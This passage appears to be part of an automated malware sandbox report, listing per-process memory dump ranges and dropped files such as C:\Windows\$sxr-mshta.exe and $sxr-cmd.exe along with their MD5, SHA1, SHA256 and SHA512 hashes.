| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4528-15-0x00007FF81F970000-0x00007FF820431000-memory.dmp
memory/4528-16-0x00007FF81F970000-0x00007FF820431000-memory.dmp
memory/4528-17-0x0000020123B30000-0x0000020123B54000-memory.dmp
memory/4528-19-0x00007FF83DE60000-0x00007FF83DF1E000-memory.dmp
memory/4528-18-0x00007FF83EBD0000-0x00007FF83EDC5000-memory.dmp
memory/4528-20-0x000002013D2C0000-0x000002013DD10000-memory.dmp
memory/4528-22-0x00007FF81F970000-0x00007FF820431000-memory.dmp
memory/4528-23-0x000002013CFC0000-0x000002013D066000-memory.dmp
memory/4528-24-0x000002013DD10000-0x000002013DD66000-memory.dmp
memory/4528-25-0x000002013DD70000-0x000002013DDC8000-memory.dmp
memory/4528-26-0x0000020123B60000-0x0000020123B82000-memory.dmp
memory/4528-27-0x00007FF83EBD0000-0x00007FF83EDC5000-memory.dmp
memory/4528-29-0x000002013C230000-0x000002013C23A000-memory.dmp
memory/4268-30-0x0000000140000000-0x0000000140004000-memory.dmp
memory/4268-32-0x0000000140000000-0x0000000140004000-memory.dmp
memory/4528-33-0x00007FF81F973000-0x00007FF81F975000-memory.dmp
memory/3552-34-0x0000000000400000-0x0000000000406000-memory.dmp
memory/3552-36-0x0000000000400000-0x0000000000406000-memory.dmp
memory/4528-37-0x00007FF81F970000-0x00007FF820431000-memory.dmp
C:\Windows\$sxr-mshta.exe
| MD5 | 0b4340ed812dc82ce636c00fa5c9bef2 |
| SHA1 | 51c97ebe601ef079b16bcd87af827b0be5283d96 |
| SHA256 | dba3137811c686fd35e418d76184070e031f207002649da95385dfd05a8bb895 |
| SHA512 | d9df8c1f093ea0f7bde9c356349b2ba43e3ca04b4c87c0f33ab89dda5afe9966313a09b60720aa22a1a25d43d7c71a060af93fb8f6488201a0e301c83fa18045 |
C:\Windows\$sxr-cmd.exe
| MD5 | 8a2122e8162dbef04694b9c3e0b6cdee |
| SHA1 | f1efb0fddc156e4c61c5f78a54700e4e7984d55d |
| SHA256 | b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450 |
| SHA512 | 99e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397 |
memory/3168-60-0x00007FF83EBD0000-0x00007FF83EDC5000-memory.dmp
memory/3168-61-0x00007FF83DE60000-0x00007FF83DF1E000-memory.dmp
memory/3168-62-0x0000015665180000-0x0000015665704000-memory.dmp
memory/3168-63-0x000001566DBD0000-0x000001566E39A000-memory.dmp
memory/3168-64-0x000001566E3A0000-0x000001566E7DE000-memory.dmp
memory/3168-65-0x000001566E7E0000-0x000001566E892000-memory.dmp
memory/3168-66-0x00000156642A0000-0x00000156642C2000-memory.dmp
memory/3168-67-0x00007FF83EBD0000-0x00007FF83EDC5000-memory.dmp
memory/4528-75-0x00007FF81F970000-0x00007FF820431000-memory.dmp
memory/3168-76-0x00000156660A0000-0x00000156660F0000-memory.dmp
memory/3168-77-0x00000156661B0000-0x0000015666262000-memory.dmp
memory/3168-78-0x0000015666440000-0x0000015666602000-memory.dmp
memory/3168-79-0x00000156660F0000-0x000001566612C000-memory.dmp
memory/3168-80-0x0000015666050000-0x000001566609E000-memory.dmp
memory/4788-84-0x0000000140000000-0x0000000140028000-memory.dmp
memory/4788-87-0x00007FF83DE60000-0x00007FF83DF1E000-memory.dmp
memory/4788-86-0x00007FF83EBD0000-0x00007FF83EDC5000-memory.dmp
memory/4788-85-0x0000000140000000-0x0000000140028000-memory.dmp
memory/3168-83-0x0000015666130000-0x0000015666166000-memory.dmp
memory/3168-82-0x00007FF83DE60000-0x00007FF83DF1E000-memory.dmp
memory/3168-81-0x00007FF83EBD0000-0x00007FF83EDC5000-memory.dmp
memory/4788-88-0x0000000140000000-0x0000000140028000-memory.dmp
memory/616-94-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp
memory/392-105-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp
memory/1152-125-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp
memory/956-127-0x0000027FCEFA0000-0x0000027FCEFC7000-memory.dmp
memory/1152-124-0x00000200F38D0000-0x00000200F38F7000-memory.dmp
memory/1144-122-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp
memory/1144-121-0x0000024704B40000-0x0000024704B67000-memory.dmp
memory/1136-119-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp
memory/1136-118-0x000001D6D1FA0000-0x000001D6D1FC7000-memory.dmp
memory/1128-116-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp
memory/1128-115-0x000001E1007D0000-0x000001E1007F7000-memory.dmp
memory/436-113-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp
memory/436-112-0x000002071F7D0000-0x000002071F7F7000-memory.dmp
memory/392-104-0x0000013DF5DC0000-0x0000013DF5DE7000-memory.dmp
memory/1016-101-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp
memory/676-99-0x00007FF7FEC50000-0x00007FF7FEC60000-memory.dmp
memory/1016-98-0x000001F5B8B30000-0x000001F5B8B57000-memory.dmp
memory/676-93-0x00000290A7490000-0x00000290A74B7000-memory.dmp
memory/616-91-0x000001EA278E0000-0x000001EA27907000-memory.dmp
memory/616-90-0x000001EA278B0000-0x000001EA278D2000-memory.dmp
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4774.tmp.csv
| MD5 | e75427096036e766270102ddad04b3e7 |
| SHA1 | 746ea8d0d1b84a0dd7c250e67f7307348abbbfeb |
| SHA256 | 147fe85a518d534c6d5319bf5ebe20c116f152280aeaddd7bbe764cce38e777b |
| SHA512 | ee1568eac456964a620a4c7a46707c87457606457e80d8e47d6cf453fe22fec25a71a02ec94a7eca9ed2827ad0d97148545a426f4f1b39142440775412a807ba |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4794.tmp.txt
| MD5 | dea8a66faf66ccc405c61edc00bce542 |
| SHA1 | c76606dabf5665081f8a3e98830a1605df08e552 |
| SHA256 | 40c5f0c40e110c031732b494d55a78449e11066eef28537c21f3c48f6f3bead8 |
| SHA512 | 657bebecedad843c723a5e73f9499f978135836a8c32d24ccdf8ae84d37103ca0b32500650068f8cb2758180938e664e6ff77ad598565f7efe12ae5dec6c6917 |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER4FE2.tmp.csv
| MD5 | 2aa06b36e05bfda6ef341bc41bb46b86 |
| SHA1 | 2d15b0ecabbc13db2a6f1bda2457f97f8ceedef2 |
| SHA256 | 4033805b08b1ca41789226649a504b6dd76d9e9578622dd5aa6006ec78d6646b |
| SHA512 | 1d50bdf1f4d06ce8e10f36b05ab9a6f3281da26a2589e6006dad3cb4e4e9eb849e9ba152c65497868fb2f9ebd1e3b214bf9ab1587a3fc87ef0e895b29d71200a |
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5002.tmp.txt
| MD5 | cc2e708111bc4491d8f47967d3343bf3 |
| SHA1 | 816ff84dfe8ad7d275842fb0a9080299b5e8890a |
| SHA256 | 099f7186c89c968eb6c3cb635aa913b09f9ec474e664929ff720a20aca584338 |
| SHA512 | e1ab58a51f62c924f2b2ef5210a4191ddb60fc0890b0f55646fb05c5dd6c7908d25790136e86f592e18a7c138659858e5cecb5ecbca7f946b41f341e88951c2e |
memory/4528-1556-0x00007FF81F970000-0x00007FF820431000-memory.dmp